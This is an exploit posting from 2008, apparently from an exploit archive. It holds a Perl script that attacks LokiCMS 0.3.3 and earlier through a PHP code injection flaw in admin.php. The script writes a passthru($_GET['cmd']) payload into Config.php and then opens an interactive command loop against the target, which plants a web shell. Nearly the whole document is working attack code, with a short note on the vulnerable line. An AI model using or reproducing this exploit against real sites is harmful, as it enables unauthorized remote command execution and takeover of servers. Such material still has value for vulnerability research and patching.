lokicms-exec.txt
Posted on 09 April 2008
# Author: __GiReX__ # mySite: girex.altervista.org # Date: 8/04/08 # CMS: LokiCMS <= 0.3.3 # Site: lokicms.com # Bug: PHP Code Injection # Exploit: Remote Command Execution # Vuln Code: admin.php # if ($_GET['default'] != '') { // User want's to set the default page # writeconfig($c_password, $c_title, $c_header, $c_tagline, $c_footnote, stripslashes($_GET['default']), # $c_theme, $c_language, $c_modrewrite, $c_simplelink, $c_code); # Our bugged var $_GET['default'] is stripslashed so we don't need magic_quotes_gpc Off # writeconfig() simply put text into Config.php # This is a very bugged CMS, only most dengerous bug is here reported #!/usr/bin/perl -w # LokiCMS <= 0.3.3 Remote Command Execution Exploit # Works with magic_quotes_gpc = On # Coded by __GiReX__ use LWP::Simple; if(not defined $ARGV[0]) { banner(); print "[-] Usage: perl $0 [host] [path] "; print "[-] Example: perl $0 localhost /lokicms/ "; exit; } my $host = $ARGV[0] =~ /^http:/// ? $ARGV[0]: 'http://' . $ARGV[0]; $host .= $ARGV[1] unless not defined $ARGV[1]; banner(); get($host.'admin.php?default=';passthru($_GET['cmd']);//') or die '[-] Error requesting page: admin.php'; while(1) { print "[+] Shell:~$ "; chomp($cmd = <STDIN>); last if $cmd eq 'exit'; last if is_error(getprint($host."includes/Config.php?cmd=${cmd}")); print $resp; } sub banner { print "[+] LokiCMS <= 0.3.3 Remote Command Execution Exploit "; print "[+] Coded by __GiReX__ "; print " "; }
